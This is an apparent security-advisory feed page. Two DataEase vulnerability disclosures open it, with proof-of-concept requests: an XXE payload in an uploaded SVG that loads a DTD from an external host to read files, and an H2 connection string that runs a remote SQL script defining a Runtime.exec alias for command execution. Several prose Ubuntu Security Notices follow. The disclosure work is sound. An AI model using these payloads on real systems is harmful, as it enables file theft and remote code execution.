#ubuntu

### Impact There is an XML external entity injection vulnerability in the static resource upload interface of DataEase. An attacker can construct a payload to implement intranet detection and file reading. 1. send request: ``` POST /de2api/staticResource/upload/1 HTTP/1.1 Host: dataease.ubuntu20.vm Content-Length: 348 Accept: application/json, text/plain, */* out_auth_platform: default X-DE-TOKEN: jwt User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6OZBNygiUCAZEbMn ------WebKitFormBoundary6OZBNygiUCAZEbMn Content-Disposition: form-data; name="file"; filename="1.svg" Content-Type: a <?xml version='1.0'?> <!DOCTYPE xxe [ <!ENTITY % EvilDTD SYSTEM 'http://10.168.174.1:8000/1.dtd'> %EvilDTD; %LoadOOBEnt; %OOB; ]> ------WebKitFormBoundary6OZBNygiUCAZEbMn-- // 1.dtd的内容 <!ENTITY % resource SYSTEM "file:///...

### Impact An attacker can achieve remote command execution by adding a carefully constructed h2 data source connection string. request message: ``` POST /de2api/datasource/validate HTTP/1.1 Host: dataease.ubuntu20.vm User-Agent: python-requests/2.31.0 Accept-Encoding: gzip, deflate Accept: */* Connection: close X-DE-TOKEN: jwt Content-Length: 209 Content-Type: application/json { "id": "", "name": "test", "type": "h2", "configuration": "eyJqZGJjIjogImpkYmM6aDI6bWVtOnRlc3Q7VFJBQ0VfTEVWRUxfU1lTVEVNX09VVD0zO0lOSVQ9UlVOU0NSSVBUIEZST00gJ2h0dHA6Ly8xMC4xNjguMTc0LjE6ODAwMC9wb2Muc3FsJzsifQ==" } ``` h2 data source connection string: ``` // configuration { "jdbc": "jdbc:h2:mem:test;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '[http://10.168.174.1:8000/poc.sql'](http://10.168.174.1:8000/poc.sql%27);", } ``` the content of poc.sql: ``` // poc.sql CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "su18";}';CA...

Ubuntu Security Notice 7028-1 - It was discovered that the JFS file system contained an out-of-bounds read vulnerability when printing xattr debug information. A local attacker could use this to cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

Ubuntu Security Notice 7020-2 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

Ubuntu Security Notice 7007-2 - Chenyuan Yang discovered that the CEC driver driver in the Linux kernel contained a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. Chenyuan Yang discovered that the USB Gadget subsystem in the Linux kernel did not properly check for the device to be enabled before writing. A local attacker could possibly use this to cause a denial of service.

Ubuntu Security Notice 6992-2 - USN-6992-1 fixed vulnerabilities in Firefox. The update introduced several minor regressions. This update fixes the problem. Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. Nils Bars discovered that Firefox contained a type confusion vulnerability when performing certain property name lookups. An attacker could potentially exploit this issue to cause a denial of service, or execute arbitrary code. It was discovered that Firefox did not properly manage memory during garbage collection. An attacker could potentially exploit this issue to cause a denial of service, or execute arbitrary code. Seunghyun Lee discovered that Firefox contained a type confusion vulnerability when handling certain ArrayTypes. An attacker could potentially exploit this ...

Ubuntu Security Notice 7027-1 - It was discovered that Emacs incorrectly handled input sanitization. An attacker could possibly use this issue to execute arbitrary commands. This issue only affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS and Ubuntu 22.04 LTS. Xi Lu discovered that Emacs incorrectly handled input sanitization. An attacker could possibly use this issue to execute arbitrary commands. This issue only affected Ubuntu 16.04 LTS, Ubuntu 18.04 LTS, Ubuntu 20.04 LTS and Ubuntu 22.04 LTS.

Ubuntu Security Notice 6968-2 - USN-6968-1 fixed CVE-2024-7348 in PostgreSQL-12, PostgreSQL-14, and PostgreSQL-16 This update provides the corresponding updates for PostgreSQL-9.5 in Ubuntu 16.04 LTS. Noah Misch discovered that PostgreSQL incorrectly handled certain SQL objects. An attacker could possibly use this issue to execute arbitrary SQL functions as the superuser.

Ubuntu Security Notice 7015-2 - USN-7015-1 fixed several vulnerabilities in Python. This update provides one of the corresponding updates for python2.7 for Ubuntu 16.04 LTS, Ubuntu 18.04 LTS, Ubuntu 20.04 LTS, and Ubuntu 22.04 LTS, and a second for python3.5 for Ubuntu 16.04 LTS. It was discovered that Python allowed excessive backtracking while parsing certain tarfile headers. A remote attacker could possibly use this issue to cause Python to consume resources, leading to a denial of service. This issue only affected python3.5 for Ubuntu 16.04 LTS

Ubuntu Security Notice 7024-1 - It was discovered that tgt attempts to achieve entropy by calling rand without srand. The PRNG seed is always 1, and thus the sequence of challenges is always identical.